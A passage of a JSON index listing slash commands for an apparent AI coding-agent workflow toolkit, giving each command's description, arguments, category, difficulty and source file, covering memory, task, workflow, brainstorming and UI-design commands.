|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/compact.md"
|
||||
},
|
||||
{
|
||||
"name": "docs-full-cli",
|
||||
"command": "/memory:docs-full-cli",
|
||||
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs-full-cli.md"
|
||||
},
|
||||
{
|
||||
"name": "docs-related-cli",
|
||||
"command": "/memory:docs-related-cli",
|
||||
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
|
||||
"arguments": "[--tool <gemini|qwen|codex>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs-related-cli.md"
|
||||
},
|
||||
{
|
||||
"name": "docs",
|
||||
"command": "/memory:docs",
|
||||
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/docs.md"
|
||||
},
|
||||
{
|
||||
"name": "load-skill-memory",
|
||||
"command": "/memory:load-skill-memory",
|
||||
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
|
||||
"arguments": "[skill_name] \\\"task intent description\\",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "load",
|
||||
"command": "/memory:load",
|
||||
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
|
||||
"arguments": "[--tool gemini|qwen] \\\"task context description\\",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load.md"
|
||||
},
|
||||
{
|
||||
"name": "skill-memory",
|
||||
"command": "/memory:skill-memory",
|
||||
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "style-skill-memory",
|
||||
"command": "/memory:style-skill-memory",
|
||||
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
|
||||
"arguments": "[package-name] [--regenerate]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/style-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "swagger-docs",
|
||||
"command": "/memory:swagger-docs",
|
||||
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/swagger-docs.md"
|
||||
},
|
||||
{
|
||||
"name": "tech-research-rules",
|
||||
"command": "/memory:tech-research-rules",
|
||||
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
|
||||
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/tech-research-rules.md"
|
||||
},
|
||||
{
|
||||
"name": "update-full",
|
||||
"command": "/memory:update-full",
|
||||
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
|
||||
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-full.md"
|
||||
},
|
||||
{
|
||||
"name": "update-related",
|
||||
"command": "/memory:update-related",
|
||||
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
|
||||
"arguments": "[--tool gemini|qwen|codex]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-related.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow-skill-memory",
|
||||
"command": "/memory:workflow-skill-memory",
|
||||
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
|
||||
"arguments": "session <session-id> | all",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/workflow-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "breakdown",
|
||||
"command": "/task:breakdown",
|
||||
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/breakdown.md"
|
||||
},
|
||||
{
|
||||
"name": "create",
|
||||
"command": "/task:create",
|
||||
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
|
||||
"arguments": "\\\"task title\\",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/create.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/task:execute",
|
||||
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/task:replan",
|
||||
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
|
||||
"arguments": "task-id [\\\"text\\\"|file.md] | --batch [verification-report.md]",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "version",
|
||||
"command": "/version",
|
||||
"description": "Display Claude Code version information and check for updates",
|
||||
"arguments": "",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/version.md"
|
||||
},
|
||||
{
|
||||
"name": "action-plan-verify",
|
||||
"command": "/workflow:action-plan-verify",
|
||||
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/action-plan-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "api-designer",
|
||||
"command": "/workflow:brainstorm:api-designer",
|
||||
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/api-designer.md"
|
||||
},
|
||||
{
|
||||
"name": "artifacts",
|
||||
"command": "/workflow:brainstorm:artifacts",
|
||||
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
|
||||
"arguments": "topic or challenge description [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/artifacts.md"
|
||||
},
|
||||
{
|
||||
"name": "auto-parallel",
|
||||
"command": "/workflow:brainstorm:auto-parallel",
|
||||
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
|
||||
"arguments": "topic or challenge description\" [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
|
||||
},
|
||||
{
|
||||
"name": "data-architect",
|
||||
"command": "/workflow:brainstorm:data-architect",
|
||||
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/data-architect.md"
|
||||
},
|
||||
{
|
||||
"name": "product-manager",
|
||||
"command": "/workflow:brainstorm:product-manager",
|
||||
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/product-manager.md"
|
||||
},
|
||||
{
|
||||
"name": "product-owner",
|
||||
"command": "/workflow:brainstorm:product-owner",
|
||||
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/product-owner.md"
|
||||
},
|
||||
{
|
||||
"name": "scrum-master",
|
||||
"command": "/workflow:brainstorm:scrum-master",
|
||||
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
|
||||
},
|
||||
{
|
||||
"name": "subject-matter-expert",
|
||||
"command": "/workflow:brainstorm:subject-matter-expert",
|
||||
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
|
||||
},
|
||||
{
|
||||
"name": "synthesis",
|
||||
"command": "/workflow:brainstorm:synthesis",
|
||||
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/synthesis.md"
|
||||
},
|
||||
{
|
||||
"name": "system-architect",
|
||||
"command": "/workflow:brainstorm:system-architect",
|
||||
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/system-architect.md"
|
||||
},
|
||||
{
|
||||
"name": "ui-designer",
|
||||
"command": "/workflow:brainstorm:ui-designer",
|
||||
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
|
||||
},
|
||||
{
|
||||
"name": "ux-expert",
|
||||
"command": "/workflow:brainstorm:ux-expert",
|
||||
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
|
||||
},
|
||||
{
|
||||
"name": "clean",
|
||||
"command": "/workflow:clean",
|
||||
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
|
||||
"arguments": "[--dry-run] [\\\"focus area\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/clean.md"
|
||||
},
|
||||
{
|
||||
"name": "debug",
|
||||
"command": "/workflow:debug",
|
||||
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
|
||||
"arguments": "\\\"bug description or error message\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/debug.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/workflow:execute",
|
||||
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "init",
|
||||
"command": "/workflow:init",
|
||||
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
|
||||
"arguments": "[--regenerate]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/init.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-execute",
|
||||
"command": "/workflow:lite-execute",
|
||||
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
|
||||
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-fix",
|
||||
"command": "/workflow:lite-fix",
|
||||
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
|
||||
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-plan",
|
||||
"command": "/workflow:lite-plan",
|
||||
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
|
||||
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/workflow:plan",
|
||||
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
|
||||
"arguments": "\\\"text description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/workflow:replan",
|
||||
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
|
||||
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "review-fix",
|
||||
"command": "/workflow:review-fix",
|
||||
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
|
||||
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "review-module-cycle",
|
||||
"command": "/workflow:review-module-cycle",
|
||||
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
|
||||
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-module-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review-session-cycle",
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
|
||||
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-session-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review",
|
||||
"command": "/workflow:review",
|
||||
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
|
||||
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review.md"
|
||||
},
|
||||
{
|
||||
"name": "complete",
|
||||
"command": "/workflow:session:complete",
|
||||
"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/complete.md"
|
||||
},
|
||||
{
|
||||
"name": "list",
|
||||
"command": "/workflow:session:list",
|
||||
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/workflow/session/list.md"
|
||||
},
|
||||
{
|
||||
"name": "resume",
|
||||
"command": "/workflow:session:resume",
|
||||
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/resume.md"
|
||||
},
|
||||
{
|
||||
"name": "solidify",
|
||||
"command": "/workflow:session:solidify",
|
||||
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
|
||||
"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/solidify.md"
|
||||
},
|
||||
{
|
||||
"name": "start",
|
||||
"command": "/workflow:session:start",
|
||||
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
|
||||
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/start.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-plan",
|
||||
"command": "/workflow:tdd-plan",
|
||||
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
|
||||
"arguments": "\\\"feature description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tdd-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-verify",
|
||||
"command": "/workflow:tdd-verify",
|
||||
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
|
||||
"arguments": "[optional: WFS-session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tdd-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "test-cycle-execute",
|
||||
"command": "/workflow:test-cycle-execute",
|
||||
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-cycle-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "test-fix-gen",
|
||||
"command": "/workflow:test-fix-gen",
|
||||
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
|
||||
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-fix-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "test-gen",
|
||||
"command": "/workflow:test-gen",
|
||||
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
|
||||
"arguments": "source-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "conflict-resolution",
|
||||
"command": "/workflow:tools:conflict-resolution",
|
||||
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
|
||||
"arguments": "--session WFS-session-id --context path/to/context-package.json",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/conflict-resolution.md"
|
||||
},
|
||||
{
|
||||
"name": "gather",
|
||||
"command": "/workflow:tools:gather",
|
||||
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
|
||||
"arguments": "--session WFS-session-id \\\"task description\\",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/context-gather.md"
|
||||
},
|
||||
{
|
||||
"name": "task-generate-agent",
|
||||
"command": "/workflow:tools:task-generate-agent",
|
||||
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/task-generate-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "task-generate-tdd",
|
||||
"command": "/workflow:tools:task-generate-tdd",
|
||||
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/task-generate-tdd.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-coverage-analysis",
|
||||
"command": "/workflow:tools:tdd-coverage-analysis",
|
||||
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
|
||||
},
|
||||
{
|
||||
"name": "test-concept-enhanced",
|
||||
"command": "/workflow:tools:test-concept-enhanced",
|
||||
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
|
||||
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
|
||||
},
|
||||
{
|
||||
"name": "test-context-gather",
|
||||
"command": "/workflow:tools:test-context-gather",
|
||||
"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
|
||||
"arguments": "--session WFS-test-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-context-gather.md"
|
||||
},
|
||||
{
|
||||
"name": "test-task-generate",
|
||||
"command": "/workflow:tools:test-task-generate",
|
||||
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
|
||||
"arguments": "--session WFS-test-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-task-generate.md"
|
||||
},
|
||||
{
|
||||
"name": "animation-extract",
|
||||
"command": "/workflow:ui-design:animation-extract",
|
||||
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/animation-extract.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:codify-style",
|
||||
"command": "/workflow:ui-design:codify-style",
|
||||
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
|
||||
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/codify-style.md"
|
||||
},
|
||||
{
|
||||
"name": "design-sync",
|
||||
"command": "/workflow:ui-design:design-sync",
|
||||
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
|
||||
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/design-sync.md"
|
||||
},
|
||||
{
|
||||
"name": "explore-auto",
|
||||
"command": "/workflow:ui-design:explore-auto",
|
||||
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
|
||||
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
|
||||
